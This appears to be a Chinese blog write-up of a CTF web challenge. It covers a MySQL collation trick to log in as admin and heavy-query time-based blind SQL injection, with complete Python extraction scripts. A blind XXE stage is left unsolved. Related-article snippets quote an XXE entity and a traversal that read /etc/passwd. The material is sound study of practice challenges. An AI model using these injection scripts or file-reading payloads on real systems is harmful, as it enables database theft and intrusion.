一道结合了mysql字符集collation,heavy query,blind xxe的综合题目

最新推荐文章于 2021-03-31 22:27:38 发布
最新推荐文章于 2021-03-31 22:27:38 发布
阅读量307 收藏
点赞数
分类专栏: ctfweb sqli xxe 文章标签: ctfweb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013457794/article/details/89088585
版权
ctfweb 同时被 3 个专栏收录
13 篇文章 0 订阅
订阅专栏
sqli
5 篇文章 0 订阅
订阅专栏
xxe
1 篇文章 0 订阅
订阅专栏

一道结合了mysql字符集collation,heavy query,blind xxe的综合题目

2019年4月8日11:07:51

###一,mysql字符集collation###

REFERENCE:
mysql字符集与比对方法collation
Collation chart for utf8_general_ci, European alphabets (MySQL 6.0.4)

主页面非常简单,只有一个登陆功能,提示要以admin账户登陆。

登陆无论输入什么都是username or password error!,输入一些特殊字符还会触发waf:

解题思路:

  1. 猜测这道题考的是sql注入,且要求用admin账户登陆
  2. 我们要做的是通过尝试来猜测后台拼接语句
  3. 通过sqli得到admin密码或者cookie之类的

用字典爆破了一下,发现过滤了很多关键字:

看来题目并不想让我们sqli,扫一下后台果然发现robots.txt:

.........login.php

$username = preg_replace("/[0-9a-zA-Z\[\]\=]/", "", $username);
$regex ="/`|'|\"|=|>|<|\/\*|;|\.\.\/|\.\/|,|\^|#|--|&/i";
if(preg_match($regex,$username))
{
die("hacker?");
}
$sql="SELECT * FROM users WHERE username='".$username."'";

.........

后台把a-zA-Z都替换成了空,还要我们传入admin,这里考的其实是个trick,见REFERENCE
于是通过查表替换admin为%C3%A0%C4%8F%E1%B9%81%C3%8D%C3%B1。但是遇到了新的问题:修改后通过脚本发送后还是没有绕过:

url="http://ip:port/login.php"
data={
    'username':"%C3%A0%C4%8F%E1%B9%81%C3%8D%C3%B1",
    'password':"1"
}
cookies={
    "PHPSESSID":"fceeqdmu5cj7k32tjlh7b63nk5"
}
r=requests.post(url=url,data=data,cookies=cookies)
print r.content

接着在浏览器端用hackbar提交依然错误,并且参数还错误解析为:

可能是浏览器对unicode编码的解析问题,最后只能再在bp上试一下:

没想到,竟然成功了,进入了一个新的页面。看来是python和浏览器对于unicode都有自己的想法,要弄清楚这个问题还得之后再深究一下。

二,heqvy sql

导航栏有一个 content 链接,url是http://ip:port/content.php?id=1,页面也提示是sqli,这下才真的是sql注入

  1. 在url中常规sql fuzz:

  1. 再测试一下联合查询注入和报错注入发现没有任何反应,根据过滤sleep() 和 benchmark(),估计是考时间盲注,这里可以用到heavy query,脚本如下:

     import requests
 cookies={
 'PHPSESSID':"fceeqdmu5cj7k32tjlh7b63nk5"
 }
 url = "http://ip:port/content.php?id=1' and %s and (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C)%%23"
 data = ""
 for i in range(1,1000):
     for j in range(33,127):
         #payload = "(ascii(substr((database()),%s,1))=%s)"%(i,j)  #heavysql
         #payload = "(ascii(substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),%s,1))=%s)" % (i, j) #content,secret,users
         #payload = "(ascii(substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='secret'),%s,1))=%s)" % (i, j) #id,secret
         payload = "(ascii(substr((select secret from secret limit 1),%s,1))=%s)" % (i, j) #you can find flag in./wwwwwwrittttteeee.php
         payload_url = url%(payload)
         try:
             r = requests.get(url=payload_url,cookies=cookies,timeout=3)
 			#需注意这里的timeout需要根据网络情况适时调整
         except:
             data +=chr(j)
             print data
             break

得到提示./wwwwwwrittttteeee.php,访问之

脚本多种写法:

除了用ascii(substr())或者ascii(mid())之外,还可以用regexp '^$'的方法,利用正则不用担心中间某次因为网络状况不好而出错,因为每次匹配都是根据之前匹配出的字符串接之后的字符串来匹配。

但是也有一个缺点,就是如果目标字符串中有单个字符的元字符例如?*.^$+,需要提前进行转义,需要注意的是,转义需要添加两个\

或者用另外一个办法,将查询到的字符串转换为十六进制,但是这样有个新的问题就是会将原字符串扩充为两倍(十进制字符转成十六进制数),如果是时间盲注则会大大增加时间成本,但是如果不是时间盲注则会缩短时间成本。附脚本如下:

import requests
import string

url ='''http://ip:port/content.php?id=1'or %s and (SELECT count(*) FROM information_schema.columns A, 
information_schema.columns B, information_schema.columns C)--+'''

cookies={
    'PHPSESSID':"h6f1rh7vpjf2do6ko1dort31k4"
}

#payload="(database() regexp '^%s')"       #heavysql
#payload="(select group_concat(table_name) from information_schema.tables where table_schema='heavysql') regexp '^%s'"  #content,secret,users
#payload="(select group_concat(column_name) from information_schema.columns where table_name='users') regexp '^%s'"  #id,username,password
#payload="(select group_concat(column_name) from information_schema.columns where table_name='secret') regexp '^%s'"  #id,secret
payload="(select secret from secret limit 0,1) regexp '^%s'"

flag=""
for i in range (1,100):
	print i
    for letter in string.printable:
        if letter in "^*+$.":
            letter='\\\\%s'%(letter)
        tpayload=payload%(flag+letter)
        turl = url%(tpayload)
        try:
            r=requests.get(url=turl,cookies=cookies,timeout=3)
            #print r.content
        except:
            flag=flag+letter
            print flag
            break

第二种方法,将查询到的字符串转为十六进制

payload="(select hex(secret) from secret limit 0,1) regexp '^%s'" #you+can+find+flag+in
hex_tables="0123456789abcdef"        
flag=''         
for i in range(1,100):
    print i
    #for letter in string.printable:
    for letter in hex_tables:
        tpayload=payload%(flag+letter)
        turl = url%(tpayload)
        try:
            r=requests.get(url=turl,cookies=cookies,timeout=3)
            #print r.content
        except:
            flag=flag+letter
            print flag
			break              
#a="796f752063616e2066696e6420666c616720696e2e2f77777777777772697474747474656565652e706870"
#flag = ''.join([chr(int(b, 16)) for b in [a[i:i+2] for i in range(0, len(a), 2)]])

三,Blind XXE

看页面框内有提示是XXE,尝试了一下没有回显,猜测是Blind xxe,需要服务器接收信息,但是暂时还没找到合适的服务器,这道题就先做到这里了,收获很多。

young9222
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql limit不接具体数字_打败Jooq SQL生成器的,不是另一个更好的SQL生成器,而是String Template
weixin_39610722的博客
11-20 417
作为数据产品公司的一员,天天都要和各种数据库的SQL打交道。可以参考之前的几篇SQL相关文章:SQL的弱点(1):复杂SQL不易理解,以及软件工程如何来帮忙SQL的弱点(2):不支持从所有列中去除某列SQL的弱点(3):缺少静态类型检查本文主要介绍一下SQL解析器(SQL Parser)和 SQL生成器(SQL Generator)SQL解析器对于SQL解析器,我们有“编译原理”的支持。解析SQL...
mysql延迟注入是什么_mysql 延时注入新思路
weixin_42292183的博客
01-19 314
转自先知社区https://xz.aliyun.com/t/2288在4月的pwnhub比赛中,我们遇到了一个比较神奇的问题,如果在注入中遇到需要延时注入的情况,但服务端过滤了我们一般使用的sleep和benchmark函数,这时候我们有没有办法使用别的方式来替代这两个函数造成延时呢?这里可以代码看看require 'conn.php';$id = $_GET['id'];if(preg_matc...
sql时间盲注另外两种方式(benchmark,heavy query)
weixin_34378045的博客
05-19 367
在某些情况下进行时间盲注的时候,如果sleep()函数无法使用,我们可以使用以下两种方式来达到延时的效果。 1.benchmark() benchmark是Mysql的一个内置函数,其作用是来测试一些函数的执行速度。benchmark()中带有两个参数,第一个是执行的次数,第二个是要执行的函数或者是表达式 mysql> select BENCHMARK(10000,md5('a')...
SQL:条件查询&&处理查询结果
热门推荐
OceanStar的博客
01-09 1万+
问题描述:当执行语句insert into boy(name) values(“最直接的方法就是直接去数据表里”);出现ERROR 1366 (HY000): Incorrect string value: ‘\xE6\x9C\x80\xE7\x9B\xB4…’ for column ‘name’ at row 1 1、查看字符集 mysql&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt; show varia
mysql字符集与比对方法collation
02-21
MySQL字符集与比对方法Collation是数据库设计中的重要概念,尤其在处理多语言或有特殊字符需求的数据时。字符集(Character Set)定义了数据的编码方式,而比对方法(Collation)则规定了字符的排序和比较规则。在...
深入Mysql字符集设置[精华结合]
09-11
MySQL字符集设置是数据库管理中的一个重要环节,它涉及到数据的存储、检索和比较。字符集定义了字符的编码方式,而字符序则规定了字符之间的比较规则。在MySQL中,字符集和字符序的选择对数据库的多语言支持、数据...
修改mysql默认字符集的两种方法详细解析
09-10
MySQL是一种广泛使用的开源关系型数据库管理系统,其默认字符集配置对于处理各种语言的数据至关重要。字符集决定了数据库如何存储和显示文本信息,特别是对于包含非ASCII字符(如中文、日文等)的语言。本文将详细...
linux下设置mysql字符集为UTF-8以及mysql重启.docx
02-22
这里的`default-character-set`定义了MySQL的默认字符集,`character-set-server`设置了服务器级别的字符集,而`collation-server`则指定了排序规则,`utf8_general_ci`是一种不区分大小写的排序规则,适用于大多数...
MySQL字符集的基本类型与统一字符集分析
09-11
MySQL字符集是数据库管理系统中用于处理和存储文本数据的关键组件,它决定了数据库、表、列和连接等不同层面的数据编码方式。了解和掌握MySQL字符集的基本类型与统一字符集的操作方法对于确保数据的一致性和兼容性至...
Time-Based Blind SQL Injection using heavy queries- A practical approach for MS SQL Server, MS Access, Oracle and MySQL databases and Marathon Tool
09-07
Time-Based Blind SQL Injection using heavy queries- A practical approach for MS SQL Server, MS Access, Oracle and MySQL databases and Marathon Tool
sql延时小tip:heavy-query
dengzhasong7076的博客
10-31 137
当一个时间盲注中不能用sleep等函数的时候,为了达到延时的效果,可以查询一些量比较大的表做笛卡尔集运算,导致查询缓慢。 SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C 出数据的话,就利用and的性质来判断,一般会有这...
Mysql详解my-innodb-heavy-4G.cnf 配置
weixin_34194379的博客
12-16 265
#BEGINCONFIGINFO #DESCR:4GBRAM,InnoDBonly,ACID,fewconnections,heavyqueries #TYPE:SYSTEM #ENDCONFIGINFO开始配置信息描述:4GB 内存、只有 InnoDB、ACID、几个连接数、繁重的查询类型:系统结束配置信息#ThisisaMySQLexa...
WebGoat SQL盲注 解题思路
Abracadabra的专栏
09-20 4660
WebGoat SQL盲注 解题思路 ★ 题目:SQL Injection (advanced) 地址: http://127.0.0.1:8080/WebGoat/start.mvc#lesson/SqlInjectionAdvanced.lesson/4 题目要求最终以Tom的身份登录到系统中。 LOGIN界面: REGISTER界面: ★ 什么是SQL盲注? 这是我自己的理解,不一定准确...
mysql延时注入_Sql注入的几种有趣操作
weixin_40006763的博客
12-23 423
前言sql注入无论是在CTF比赛还是s实战中都有着非同寻常的重要程度。在CTF比赛中难免会遇到一些有(keng)趣(die)的注入题,他们往往有着令人头疼的过滤规则,这时候就需要我们一步步绕过。 这种注入一般都属于盲注,然而在盲注过程中由于这些过滤规则不太好绕过,这时候就会无从下手。下面分享一下自己在做题中总结的几种比较通用的盲注手法和一些小tips,希望能在今后大家的比赛或者实战中带来...
2021-3-30 hackbar
kdlssakjdlwj的博客
03-31 610
目录Hackbar是什么SQL注入XSS攻击本地文件包含(LFI)PHP文件包含主要由这四个函数完成:include与require的区别在于:文件包含漏洞的类型分为:XXE Hackbar是什么 Firefox在渗透测试中,是一件非常强大的利器。以其众多优良的渗透插件支撑了各种渗透技术。其中,hackbar就是一种便于渗透测试人员开展SQL注入、XSS、CSRF等测试工作的必备工具。 在火狐浏览器中搜索hackbar插件,即可使用 SQL注入 提供三种数据库的sql查询语句,以及一些方便联合查询的语句
从几道CTF学习Blind XXE
0xdawn的博客
10-03 1132
0x00 前言 对于传统的XXE来说,攻击者只有在服务器有回显或报错的情况下才能使用XXE漏洞来读取服务器端文件。 例如 <!ENTITY file SYSTEM "file:///etc/passwd"> <username>&file;</username> 如果服务器没有回显,只能通过Blind XXE构造一条外带信道来提取数据,也就是数据外带。 一个实例 xml.php <?php libxml_disable_entity_loader(fal
安恒周周练西湖论剑版web美男子题:巧用group by with rollup
young9222的博客
04-08 2651
安恒周周练西湖论剑版web美男子题:巧用group by with rollup 2019年4月8日15:49:30 ###源码:### <?php include ‘global.php’; function AttackFilter($StrKey,$StrValue,$ArrReq){ if(is_array($StrValue)) { $S...
PythonServer-Flask-Pin码攻击
young9222的博客
04-03 2200
一道有关Flask开启DEBUG结合任意文件读取生成PIN码攻击的题目。可惜没有及时截图,现在只剩下文字了,凑合记录一下。 正常注册用户,登陆用户,查看源代码发现在打开图片时,图片名由base64编码 利用其解析base64的漏洞,进行目录穿越,例如对“…/…/…/…/etc/passwd"进行base64编码后查看响应包获得文件内容 由于存在文件读取漏洞,所以可以依次读取: u...
mysql 字符集转换函数
最新发布
05-09
MySQL提供了一些字符集转换函数,可以用于在不同字符集之间进行转换。以下是一些常用的字符集转换函数: 1. CONVERT()函数:该函数可以将一个字符串从一种字符集转换为另一种字符集。语法如下: ``` CONVERT(str,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值